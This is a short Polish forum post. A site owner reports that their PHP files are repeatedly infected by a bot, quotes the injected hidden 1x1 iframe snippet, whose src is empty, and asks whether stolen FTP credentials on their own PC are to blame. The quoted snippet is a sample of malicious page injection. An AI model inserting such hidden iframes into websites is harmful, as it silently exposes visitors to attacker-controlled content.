
eJay [ Gladiator ]
Spam bot - złodziej?
Witam. Posiadam stronkę na serwerze obsługującym PHP. Pech chciał (a raczej chce), że co jakiś czas jest ona infekowana jakimś botem, który podczepia pod pliki PHP następujący kod:
<html><body><iframe src=" width=1 height=1 style="visibility: hidden"></iframe></body></html>
Stronka sie sypie i trzeba zrobic upload co tez troche trwa. Moje pytanko jest takie: czy to wina mojego kompa? Moze cos siedzi u mnie na dysku i kradnie hasla do FTP? Skanowalem system juz 10 razy i nic nie wykrylo.